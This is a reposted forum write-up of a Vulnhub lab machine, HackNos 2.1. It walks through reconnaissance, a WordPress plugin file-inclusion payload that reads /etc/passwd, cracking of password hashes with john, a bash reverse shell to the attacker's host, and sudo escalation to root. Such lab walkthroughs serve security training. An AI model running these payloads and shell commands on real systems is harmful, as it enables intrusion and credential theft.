ToB企服应用市场:ToB评测及商务社交产业平台

标题: Vulnhub之HackNos 2靶机详细测试过程 [打印本页]

---

作者: 数据人与超自然意识    时间: 2023-4-4 14:11
标题: Vulnhub之HackNos 2靶机详细测试过程
HackNos 2

作者：jason huawen
靶机信息

名称：hackNos: Os-hackNos-2.1
地址：

1. https://www.vulnhub.com/entry/hacknos-os-hacknos-21,403/

复制代码

识别目标主机IP地址

1. ─(kali㉿kali)-[~/Vulnhub/HackNos2]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
4.                                                                                                                            
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
10. 192.168.56.100  08:00:27:8e:0a:96      1      60  PCS Systemtechnik GmbH                                                   
11. 192.168.56.254  08:00:27:0a:ef:c3      1      60  PCS Systemtechnik GmbH   

复制代码

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描

1. ──(kali㉿kali)-[~/Vulnhub/HackNos2]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-24 20:58 EDT
4. Nmap scan report for localhost (192.168.56.254)
5. Host is up (0.000069s latency).
6. Not shown: 65533 closed tcp ports (reset)
7. PORT   STATE SERVICE VERSION
8. 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
9. | ssh-hostkey:
10. |   2048 94364e716a83e2c11ea9526445f62980 (RSA)
11. |   256 b4ce5ac33f4052a6efdcd829f32cb5d1 (ECDSA)
12. |_  256 096c17a1a3b4c778b9adecde8f64b17b (ED25519)
13. 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
14. |_http-title: Apache2 Ubuntu Default Page: It works
15. |_http-server-header: Apache/2.4.29 (Ubuntu)
16. MAC Address: 08:00:27:0A:EF:C3 (Oracle VirtualBox virtual NIC)
17. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
19. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
20. Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

复制代码

NMAP扫描结果表明目标主机有2个开放端口：22（ssh)、80（http)
获得Shell

1. ┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
2. └─$ nikto -h http://192.168.56.254
3. - Nikto v2.1.6
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.56.254
6. + Target Hostname:    192.168.56.254
7. + Target Port:        80
8. + Start Time:         2023-03-24 21:00:45 (GMT-4)
9. ---------------------------------------------------------------------------
10. + Server: Apache/2.4.29 (Ubuntu)
11. + The anti-clickjacking X-Frame-Options header is not present.
12. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
14. + No CGI Directories found (use '-C all' to force check all possible dirs)
15. + Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5978e3d67036e, mtime: gzip
16. + Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
17. + Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
18. + Uncommon header 'link' found, with multiple values: (<http://192.168.56.254/tsweb/index.php/wp-json/>; rel="https://api.w.org/",<http://192.168.56.254/tsweb/>; rel=shortlink,)
19. + /tsweb/: Microsoft TSAC found. http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html
20. + OSVDB-3233: /icons/README: Apache default file found.
21. + 7915 requests: 0 error(s) and 9 item(s) reported on remote host
22. + End Time:           2023-03-24 21:01:35 (GMT-4) (50 seconds)
23. ---------------------------------------------------------------------------
24. + 1 host(s) tested

复制代码

nikto工具识别到/tsweb/目录，访问该目录，从返回页面可知该站点为wordpress

1. ──(kali㉿kali)-[~/Vulnhub/HackNos2]
2. └─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
3. ===============================================================
4. Gobuster v3.3
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.254
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.3
13. [+] Extensions:              sh,php,js,html,txt
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/03/24 21:03:25 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /.html                (Status: 403) [Size: 279]
19. /.php                 (Status: 403) [Size: 279]
20. /index.html           (Status: 200) [Size: 10918]
21. /.php                 (Status: 403) [Size: 279]
22. /.html                (Status: 403) [Size: 279]
23. /server-status        (Status: 403) [Size: 279]
24. Progress: 1313804 / 1323366 (99.28%)===============================================================
25. 2023/03/24 21:04:25 Finished
26. ===============================================================
27.                                                                                                                              
28. ┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
29. └─$ gobuster dir -u http://192.168.56.254/tsweb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
30. ===============================================================
31. Gobuster v3.3
32. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
33. ===============================================================
34. [+] Url:                     http://192.168.56.254/tsweb/
35. [+] Method:                  GET
36. [+] Threads:                 10
37. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
38. [+] Negative Status codes:   404
39. [+] User Agent:              gobuster/3.3
40. [+] Extensions:              html,txt,sh,php,js
41. [+] Timeout:                 10s
42. ===============================================================
43. 2023/03/24 21:10:22 Starting gobuster in directory enumeration mode
44. ===============================================================
45. /.php                 (Status: 403) [Size: 279]
46. /.html                (Status: 403) [Size: 279]
47. /index.php            (Status: 301) [Size: 0] [--> http://192.168.56.254/tsweb/]
48. /wp-content           (Status: 301) [Size: 327] [--> http://192.168.56.254/tsweb/wp-content/]
49. /wp-login.php         (Status: 200) [Size: 5654]
50. /license.txt          (Status: 200) [Size: 19935]
51. /wp-includes          (Status: 301) [Size: 328] [--> http://192.168.56.254/tsweb/wp-includes/]
52. /readme.html          (Status: 200) [Size: 7368]
53. /wp-trackback.php     (Status: 200) [Size: 135]
54. /wp-admin             (Status: 301) [Size: 325] [--> http://192.168.56.254/tsweb/wp-admin/]
55. /xmlrpc.php           (Status: 405) [Size: 42]
56. /.html                (Status: 403) [Size: 279]
57. /.php                 (Status: 403) [Size: 279]
58. /wp-signup.php        (Status: 302) [Size: 0] [--> http://192.168.56.254/tsweb/wp-login.php?action=register]
59. Progress: 1319393 / 1323366 (99.70%)===============================================================
60. 2023/03/24 21:11:24 Finished
61. ==============================================================

复制代码

接下来用wpscan工具扫描站点，看是否可以识别出用户名和插件可被利用。

1. ┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
2. └─$ wpscan --url http://192.168.56.254/tsweb/ -e u,p
3. _______________________________________________________________
4.          __          _______   _____
5.          \ \        / /  __ \ / ____|
6.           \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
7.            \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
8.             \  /\  /  | |     ____) | (__| (_| | | | |
9.              \/  \/   |_|    |_____/ \___|\__,_|_| |_|
11.          WordPress Security Scanner by the WPScan Team
12.                          Version 3.8.22
13.        Sponsored by Automattic - https://automattic.com/
14.        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
15. _______________________________________________________________
17. [i] It seems like you have not updated the database for some time.
18. [?] Do you want to update now? [Y]es [N]o, default: [N]
19. [+] URL: http://192.168.56.254/tsweb/ [192.168.56.254]
20. [+] Started: Fri Mar 24 21:12:36 2023
22. Interesting Finding(s):
24. [+] Headers
25. | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
26. | Found By: Headers (Passive Detection)
27. | Confidence: 100%
29. [+] XML-RPC seems to be enabled: http://192.168.56.254/tsweb/xmlrpc.php
30. | Found By: Direct Access (Aggressive Detection)
31. | Confidence: 100%
32. | References:
33. |  - http://codex.wordpress.org/XML-RPC_Pingback_API
34. |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
35. |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
36. |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
37. |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
39. [+] WordPress readme found: http://192.168.56.254/tsweb/readme.html
40. | Found By: Direct Access (Aggressive Detection)
41. | Confidence: 100%
43. [+] Upload directory has listing enabled: http://192.168.56.254/tsweb/wp-content/uploads/
44. | Found By: Direct Access (Aggressive Detection)
45. | Confidence: 100%
47. [+] The external WP-Cron seems to be enabled: http://192.168.56.254/tsweb/wp-cron.php
48. | Found By: Direct Access (Aggressive Detection)
49. | Confidence: 60%
50. | References:
51. |  - https://www.iplocation.net/defend-wordpress-from-ddos
52. |  - https://github.com/wpscanteam/wpscan/issues/1299
54. [+] WordPress version 5.3 identified (Insecure, released on 2019-11-12).
55. | Found By: Rss Generator (Passive Detection)
56. |  - http://192.168.56.254/tsweb/index.php/feed/, <generator>https://wordpress.org/?v=5.3</generator>
57. |  - http://192.168.56.254/tsweb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3</generator>
59. [+] WordPress theme in use: twentytwenty
60. | Location: http://192.168.56.254/tsweb/wp-content/themes/twentytwenty/
61. | Last Updated: 2022-11-02T00:00:00.000Z
62. | Readme: http://192.168.56.254/tsweb/wp-content/themes/twentytwenty/readme.txt
63. | [!] The version is out of date, the latest version is 2.1
64. | Style URL: http://192.168.56.254/tsweb/wp-content/themes/twentytwenty/style.css?ver=1.0
65. | Style Name: Twenty Twenty
66. | Style URI: https://wordpress.org/themes/twentytwenty/
67. | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
68. | Author: the WordPress team
69. | Author URI: https://wordpress.org/
70. |
71. | Found By: Css Style In Homepage (Passive Detection)
72. |
73. | Version: 1.0 (80% confidence)
74. | Found By: Style (Passive Detection)
75. |  - http://192.168.56.254/tsweb/wp-content/themes/twentytwenty/style.css?ver=1.0, Match: 'Version: 1.0'
77. [+] Enumerating Most Popular Plugins (via Passive Methods)
78. [+] Checking Plugin Versions (via Passive and Aggressive Methods)
80. [i] Plugin(s) Identified:
82. [+] gracemedia-media-player
83. | Location: http://192.168.56.254/tsweb/wp-content/plugins/gracemedia-media-player/
84. | Latest Version: 1.0 (up to date)
85. | Last Updated: 2013-07-21T15:09:00.000Z
86. |
87. | Found By: Urls In Homepage (Passive Detection)
88. |
89. | Version: 1.0 (100% confidence)
90. | Found By: Readme - Stable Tag (Aggressive Detection)
91. |  - http://192.168.56.254/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt
92. | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
93. |  - http://192.168.56.254/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt
95. [+] Enumerating Users (via Passive and Aggressive Methods)
96. Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
98. [i] User(s) Identified:
100. [+] user
101. | Found By: Rss Generator (Passive Detection)
102. | Confirmed By:
103. |  Wp Json Api (Aggressive Detection)
104. |   - http://192.168.56.254/tsweb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
105. |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
106. |  Login Error Messages (Aggressive Detection)
108. [!] No WPScan API Token given, as a result vulnerability data has not been output.
109. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
111. [+] Finished: Fri Mar 24 21:12:39 2023
112. [+] Requests Done: 55
113. [+] Cached Requests: 6
114. [+] Data Sent: 14.627 KB
115. [+] Data Received: 449.523 KB
116. [+] Memory used: 242.609 MB
117. [+] Elapsed time: 00:00:03

复制代码

wpscan工具识别出用户名user，以及插件：gracemedia-media-player，该插件有漏洞可利用本地文件包含漏洞，在尝试利用该漏洞之前，看是否可以破解出user的密码：

1. https://www.exploit-db.com/exploits/46537

复制代码

1. ─(kali㉿kali)-[~/Vulnhub/HackNos2]
2. └─$ wpscan --url http://192.168.56.254/tsweb/ -U user -P /usr/share/wordlists/rockyou.txt

复制代码

运行了17分钟仍然无果，暂时放弃。
接下来看如何利用插件的漏洞，漏洞利用位置：

1. /wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

复制代码

1. http://192.168.56.254/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

复制代码

得到返回内容：

1. root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash

复制代码

1. flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/

复制代码

用john破解

1. ┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
2. └─$ john --wordlist=/usr/share/wordlists/rockyou.txt flag_hash
3. Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
4. Use the "--format=md5crypt-long" option to force loading these as that type instead
5. Using default input encoding: UTF-8
6. Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
7. Will run 2 OpenMP threads
8. Press 'q' or Ctrl-C to abort, almost any other key for status
9. topsecret        (?)     
10. 1g 0:00:00:00 DONE (2023-03-24 21:44) 12.50g/s 81600p/s 81600c/s 81600C/s heybaby..nick123
11. Use the "--show" option to display all of the cracked passwords reliably
12. Session completed.
13.                                                                                                                              
14. ┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
15. └─$ cat flag_hash
16. $1$flag$vqjCxzjtRc7PofLYS2lWf/

复制代码

1. ──(kali㉿kali)-[~/Vulnhub/HackNos2]
2. └─$ ssh flag@192.168.56.254                                         
3. The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
4. ED25519 key fingerprint is SHA256:rIQkBhqHj9tWiuhz+gMT5Zzwq4h/22qu5apja7gnWY8.
5. This key is not known by any other names.
6. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
7. Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
8. flag@192.168.56.254's password:
9. Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
11. * Documentation:  https://help.ubuntu.com
12. * Management:     https://landscape.canonical.com
13. * Support:        https://ubuntu.com/advantage
15.   System information as of Sat Mar 25 01:45:33 UTC 2023
17.   System load:  0.07              Processes:             126
18.   Usage of /:   48.6% of 9.78GB   Users logged in:       0
19.   Memory usage: 30%               IP address for enp0s3: 192.168.56.254
20.   Swap usage:   0%
23. 5 packages can be updated.
24. 0 updates are security updates.
28. The programs included with the Ubuntu system are free software;
29. the exact distribution terms for each program are described in the
30. individual files in /usr/share/doc/*/copyright.
32. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
33. applicable law.
36. The programs included with the Ubuntu system are free software;
37. the exact distribution terms for each program are described in the
38. individual files in /usr/share/doc/*/copyright.
40. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
41. applicable law.
43. Could not chdir to home directory /home/flag: No such file or directory
44. flag@hacknos:/$ id
45. uid=1001(flag) gid=1003(flag) groups=1003(flag)
46. flag@hacknos:/$

复制代码

成功登录到用户flag

1. flag@hacknos:/$ cd /home
2. -rbash: cd: restricted
3. flag@hacknos:/$

复制代码

这是一个受限的shell
用下述方法spawn一个新的shell

1. flag@hacknos:/$ bash -c 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1'

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
2. └─$ sudo nc -nlvp 5555
3. [sudo] password for kali:
4. listening on [any] 5555 ...
5. connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 52720
6. flag@hacknos:/$ id
7. id
8. uid=1001(flag) gid=1003(flag) groups=1003(flag)
9. flag@hacknos:/$ cd /home
10. cd /home
11. flag@hacknos:/home$ ls -alh
12. ls -alh
13. total 12K
14. drwxr-xr-x  3 root  root  4.0K Nov 17  2019 .
15. drwxr-xr-x 24 root  root  4.0K Nov 17  2019 ..
16. drwxr-x--x  4 rohit rohit 4.0K Nov 17  2019 rohit
17. flag@hacknos:/home$ cd rohit
18. cd rohit
19. flag@hacknos:/home/rohit$ ls -alh
20. ls -alh
21. ls: cannot open directory '.': Permission denied
22. flag@hacknos:/home/rohit$ cd ..
23. cd ..
24. flag@hacknos:/home$

复制代码

1. flag@hacknos:/var/backups/passbkp$ cat md5-hash
2. cat md5-hash
3. $1$rohit$01Dl0NQKtgfeL08fGrggi0

复制代码

再用john工具破解

1. ┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
2. └─$ vim md5_hash
3.                                                                                                                               
4. ┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
5. └─$ john --wordlist=/usr/share/wordlists/rockyou.txt md5_hash
6. Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
7. Use the "--format=md5crypt-long" option to force loading these as that type instead
8. Using default input encoding: UTF-8
9. Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
10. Will run 2 OpenMP threads
11. Press 'q' or Ctrl-C to abort, almost any other key for status
12. !%hack41         (?)     
13. 1g 0:00:01:03 DONE (2023-03-24 21:53) 0.01563g/s 220430p/s 220430c/s 220430C/s !(3(r3@m..!##^%^
14. Use the "--show" option to display all of the cracked passwords reliably
15. Session completed.

复制代码

这应该是用户rohit的密码，切换到该用户：

1. flag@hacknos:/var/backups/passbkp$ su - rohit
2. su - rohit
3. su: must be run from a terminal
4. flag@hacknos:/var/backups/passbkp$ which python
5. which python
6. /usr/bin/python
7. flag@hacknos:/var/backups/passbkp$ python -c 'import pty;pty.spawn("/bin/bash")'
8. python -c 'import pty;pty.spawn("/bin/bash")'
9. flag@hacknos:/var/backups/passbkp$ su - rohit
10. su - rohit
11. Password: !%hack41
13. rohit@hacknos:~$ id
14. id
15. uid=1000(rohit) gid=1000(rohit) groups=1000(rohit),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
16. rohit@hacknos:~$

复制代码

提权

1. rohit@hacknos:~$ sudo -l
2. sudo -l
3. [sudo] password for rohit: !%hack41
5. Matching Defaults entries for rohit on hacknos:
6.     env_reset, mail_badpass,
7.     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
9. User rohit may run the following commands on hacknos:
10.     (ALL : ALL) ALL
11. rohit@hacknos:~$ sudo /bin/bash
12. sudo /bin/bash
13. root@hacknos:~# cd /root
14. cd /root
15. root@hacknos:/root# ls -alh
16. ls -alh
17. total 48K
18. drwx------  5 root root 4.0K Nov 17  2019 .
19. drwxr-xr-x 24 root root 4.0K Nov 17  2019 ..
20. -rw-------  1 root root 1.9K Nov 17  2019 .bash_history
21. -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
22. drwx------  2 root root 4.0K Nov 17  2019 .cache
23. drwx------  3 root root 4.0K Nov 17  2019 .gnupg
24. -rw-r--r--  1 root root  148 Aug 17  2015 .profile
25. -rw-r--r--  1 root root 1.1K Nov 17  2019 root.txt
26. drwx------  2 root root 4.0K Nov 17  2019 .ssh
27. -rw-------  1 root root  11K Nov 17  2019 .viminfo
28. root@hacknos:/root# cat root.txt
29. cat root.txt
30. _______                         __              __  __     #
31. /       \                       /  |            /  |/  |    #
32. $$$$$$$  |  ______    ______   _$$ |_          _$$ |$$ |_   #
33. $$ |__$$ | /      \  /      \ / $$   |        / $$  $$   |  #
34. $$    $$< /$$$$$$  |/$$$$$$  |$$$$$$/         $$$$$$$$$$/   #
35. $$$$$$$  |$$ |  $$ |$$ |  $$ |  $$ | __       / $$  $$   |  #
36. $$ |  $$ |$$ \__$$ |$$ \__$$ |  $$ |/  |      $$$$$$$$$$/   #
37. $$ |  $$ |$$    $$/ $$    $$/   $$  $$/         $$ |$$ |    #
38. $$/   $$/  $$$$$$/   $$$$$$/     $$$$/          $$/ $$/     #
39. #############################################################                                                         
40.                                                          
41. #############################################################                                                         
42. MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b
44. Blog : www.hackNos.com
46. Author : Rahul Gehlaut
48. linkedin : https://www.linkedin.com/in/rahulgehlaut/
49. #############################################################
50. root@hacknos:/root#

复制代码

至此提权成功，并拿到了root flag

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4